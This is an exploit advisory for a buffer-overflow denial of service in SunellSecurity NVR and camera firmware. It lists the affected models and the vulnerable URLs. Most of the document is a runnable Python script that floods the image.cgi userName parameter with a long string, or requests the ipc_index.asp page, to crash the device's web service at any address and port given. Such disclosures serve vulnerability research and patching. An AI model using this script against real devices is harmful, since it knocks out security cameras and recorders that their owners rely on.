SunellSecurity NVR / Camera - Buffer Overflow - Denial Of Service Author: qwsj / https://github.com/qwsj Vulnerability Type: Buffer Overflow Attack type: Remote Vendor of Product: SunellSecurity, Shenzhen Sunell Technology Effect: critically terminates the web service. Service restart time after exploitation: 1-3 minutes. # CAMs Vulnerability in the CGI script More info: https://cxsecurity.com/issue/WLB-2016110021 # NVRs Vulnerability in the ASP + JS scripts - b/o dos Date: 2017-11-11 Problem URL: http://IP:PORT/asppage/common/ipc_index.asp Product and firmware: - H265 32CH - 3.0 (finall release 2017-03-31) or older - H265 64CH - 3.0 (finall release 2017-03-31) or older - H264 4CH - 3.0 (finall release 2017-03-31) or older - H264 8CH - 3.0 (finall release 2017-03-31) or older - H264 16CH - 3.0 (finall release 2017-03-31) or older Exploit: #!/usr/bin/env python import urllib2 import sys class sunellbo(): def __init__(self, addr, port): self.addr = addr self.port = port def snvr(self): self.uurl = 'http://'+self.addr+':'+self.port+'/asppage/common/ipc_index.asp' print 'NVR mode. ADDR: '+self.addr+' PORT: '+self.port try: urllib2.urlopen(self.uurl, timeout = 5).read() except: sys.exit() def scam(self): self.camload = ('A' * 1071) self.uurl = 'http://'+self.addr+':'+self.port+'/cgi-bin/image.cgi?userName=-'+self.camload print 'CAM mode. ADDR: '+self.addr+' PORT: '+self.port try: urllib2.urlopen(self.uurl, timeout = 5).read() except: sys.exit() if sys.argv[1] == 'nvr': sunellbo(sys.argv[2], sys.argv[3]).snvr() elif sys.argv[1] == 'cam': sunellbo(sys.argv[2], sys.argv[3]).scam() else: print 'Use: python '+sys.argv[0]+' [MODE] [IP/DOMAIN] [PORT]' print 'MODE: cam / nvr' print 'IP/DOMAIN: x.x.x.x / example.com' print 'PORT: 80 / 81 / other' sys.exit()